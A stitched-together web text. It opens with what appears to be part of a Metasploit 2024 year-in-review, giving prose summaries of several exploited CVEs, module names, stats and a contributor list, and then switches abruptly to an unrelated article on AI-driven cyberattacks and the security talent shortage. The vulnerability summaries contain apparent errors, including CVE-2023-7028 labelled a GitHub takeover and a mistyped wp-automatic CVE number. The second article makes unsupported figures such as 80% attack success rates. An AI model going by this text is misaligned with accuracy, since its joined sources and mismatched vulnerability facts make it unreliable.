It wouldn't be a proper year without some fun WordPress vulnerabilities. CVE-2024-27596 was quite memorable as the vulnerability was contained in the popular wp-automatic plugin. The best part was that an unauthenticated user was able to perform SQL injection and even get remote code execution by uploading a malicious module. As the SQL injection allows an attacker to create an admin account, the WordPress site is fully compromised.

CVE-2023-0386
This vulnerability was discovered last year; however, it was only recently added to Metasploit as a module. It is one of the easier privilege escalations to exploit. What makes it interesting is that it combines setuid and the overlay file system to run a binary as root.

CVE-2024-37081
Vulnerabilities in VMware products are always of very high interest, as they can often be misused by threat actors. CVE-2024-37081 is a local privilege escalation in vCenter 8.0.0.10200 caused by a misconfiguration. This misconfiguration allows the attacker to run sudo commands with preserved environment variables such as PYTHONPATH, VMWARE_PYTHON_PATH and so on.

CVE-2023-7028
When it comes to version control systems, accounts are the identity of the developer. Compromising the identity exposes the whole codebase to risk. This year, we implemented a module for CVE-2023-7028, Github account takeover. This vulnerability can be exploited without any user interaction. If the attacker provides two emails in the request for password reset - administrator's email and attacker's email - the reset code for the admin account gets sent back to both emails.

Remote Code Execution in CUPS
https://github.com/rapid7/metasploit-framework/pull/19630
https://github.com/rapid7/metasploit-framework/pull/19510

The CUPS vulnerability made big headlines this year. The reason is that CUPS exposed a UDP service that listened for any host to connect. The CUPS service itself was also vulnerable, allowing an attacker to execute remote code via specially crafted print jobs. The vulnerability allowed remote code execution on virtually any Linux machine running a vulnerable version of CUPS. We have implemented a module (cups_browsed_info_disclosure) for scanning for vulnerable CUPS services and also a module for exploitation (cups_ipp_remote_code_execution).

Community Stats Recap

The entire Metasploit team would like to give a big thank you to all the contributors who added content in 2024. Your ideas and contributions make this tool greater every year. We saw code additions from 62 contributors, including 39 first-time contributors.

Here are some stats for 2024:

  • Number of new modules: 165
  • Number of new bug fixes: 142
  • Number of new enhancements: 161
  • Number of new documentations: 19
  • Number of new payload enhancements: 4

Contributors in 2024 (ordered by count)

  • h00die
  • Chocapikk
  • jvoisin
  • smashery
  • h00die-gr3y
  • h4x-x0r (new in 2024)
  • nrathaus
  • bcoles
  • errorxyz
  • upsidedwn (new in 2024)
  • The-Pink-Panther (new in 2024)
  • Takahiro-Yoko (new in 2024)
  • DaveYesland (new in 2024)
  • NtAlexio2 (new in 2024)
  • heyder
  • KanchiMoe (new in 2024)
  • ide0x90
  • ostrichgolf (new in 2024)
  • jmartin-tech
  • jalvarezz13 (new in 2024)
  • ArchiMoebius (new in 2024)
  • molecula2788 (new in 2024)
  • jjoshm (new in 2024)
  • dotslashsuperstar (new in 2024)
  • double16 (new in 2024)
  • jlownie (new in 2024)
  • randomstr1ng (new in 2024)
  • SickMcNugget (new in 2024)
  • n00bhaxor
  • lihe07 (new in 2024)
  • 6a6f656c
  • AleksaZatezalo
  • poupapaa (new in 2024)
  • Sh3llSp4wn (new in 2024)
  • ErikWynter
  • siddolo (new in 2024)
  • ggisz (new in 2024)
  • rad10
  • JustAnda7
  • pczinser (new in 2024)
  • james-otten
  • oddlittlebird (new in 2024)
  • szymonj99 (new in 2024)
  • aaryan-11-x (new in 2024)
  • soroshsabz (new in 2024)
  • dudu7615 (new in 2024)
  • Mathiou04 (new in 2024)
  • GhostlyBox (new in 2024)
  • Grezzo
  • xaitax
  • igomeow (new in 2024)
  • cn-kali-team
  • Adithya2357 (new in 2024)
  • gardnerapp
  • pmauduit (new in 2024)
  • aaronjfeingold (new in 2024)
  • e2002e
  • softScheck (new in 2024)
  • PizzaHat (new in 2024)
  • sud0Ru (new in 2024)
  • Fufu-btw (new in 2024)
  • fanqiaojun (new in 2024)

As we move into the coming months, the threat landscape for businesses is evolving rapidly, particularly with the increasing use of AI to launch cyberattacks. These AI-driven attacks are proving to be highly effective, with success rates often reaching up to 80%. This precision makes them incredibly appealing to hackers, as they can not only breach systems with greater efficiency but also reap double the returns compared to traditional methods. With AI at the helm, cybercriminals can refine their tactics, making it more challenging for companies to defend against these sophisticated threats.

The Talent Shortage: A Growing Concern

In light of these advanced threats, many organizations are struggling to find the right professional talent equipped to combat AI-generated cyberattacks. The rise in complexity and scale of these attacks demands a new breed of cybersecurity professionals who possess a blend of technical prowess and an understanding of AI-driven threat vectors. Unfortunately, the pool of experts capable of mitigating these risks is still quite limited.

This talent shortage is particularly problematic for sectors that handle sensitive data or critical infrastructure, such as healthcare, finance, transportation, and manufacturing. These industries are increasingly allocating significant portions of their budgets to bolster their in-house cybersecurity teams. Not only are businesses investing in training existing staff, but they are also offering hefty compensation packages to attract professionals with the necessary skills. For the right candidate, salaries in this field can reach the millions, reflecting the high demand for top-tier cybersecurity talent.

In-Demand Skills and Roles

Among the most sought-after professionals in this arena are incident responders, fraud analysis experts, security engineers, and cybersecurity framework architects. These roles require a combination of deep technical knowledge and practical experience in handling complex cybersecurity threats, particularly those related to AI-driven risks.

As businesses ramp up their hiring efforts, skills related to Artificial Intelligence-based Threat Detection, cloud security, data governance, and quantum computing are especially in demand. AI is playing an increasingly central role in both the offense and defense of cyber battles, making AI expertise essential for cybersecurity professionals. Similarly, the rise of cloud-based infrastructures and the increasing importance of secure data handling practices mean that cloud security and data governance skills are critical for modern-day cybersecurity roles.

Freelance Markets and the Global Talent Pool

Interestingly, the demand for cybersecurity experts isn’t confined to traditional employment channels. Online freelance marketplaces, such as Fiverr, have seen a surge in job offers for cybersecurity professionals with niche skill sets. However, despite the growing demand, many of these positions remain unfilled, highlighting the ongoing skills gap in the field. This mismatch between supply and demand further emphasizes the difficulty businesses face in finding qualified professionals who can protect against AI-driven cyber threats.

While the global demand is high, businesses like Google, Microsoft, and Amazon are stepping up to meet the challenge by offering specialized training programs. These programs are designed to upskill individuals with a strong foundation in computer science and related disciplines. Additionally, there is a concerted effort to encourage greater diversity in the cybersecurity workforce. In particular, women from developing countries such as South Africa, India, Pakistan, and the UAE are being encouraged to pursue careers in cybersecurity. Many of these women possess the right educational background and skillsets to thrive in this sector, often securing lucrative job offers with impressive compensation packages and benefits.

The Rise of Quantum Computing and Data Science Roles

Another sector that has seen an uptick in demand is quantum computing. While still an emerging field, quantum computing is expected to play a significant role in both enhancing cybersecurity measures and, paradoxically, in creating new attack vectors. As a result, experts in quantum cryptography and related fields are becoming highly sought after.

Similarly, roles for data scientists and professionals working with big data analytics are also on the rise. These professionals play a crucial role in identifying patterns in vast datasets, which can be critical for detecting unusual activity or potential security breaches. With more businesses relying on data-driven decision-making, the intersection of data science and cybersecurity is becoming increasingly important.

The Road Ahead: Strategic Investments in Cybersecurity Talent

As cybersecurity threats become more sophisticated, Chief Information Officers (CIOs) and Chief Technology Officers (CTOs) are beginning to realize the immense value of having a skilled in-house cybersecurity team. By building internal expertise, businesses can respond to cyber threats more quickly and effectively, reducing reliance on external vendors or consultants.

In the near future, it is expected that companies will not only allocate more budget to hire the necessary talent but will also invest in the required hardware and software to support their cybersecurity teams. These investments will be crucial in ensuring that organizations can not only protect their data and assets but also stay ahead of emerging threats in an increasingly complex digital world.

The post Budget boost required to tackle AI generative cyber attacks appeared first on Cybersecurity Insiders.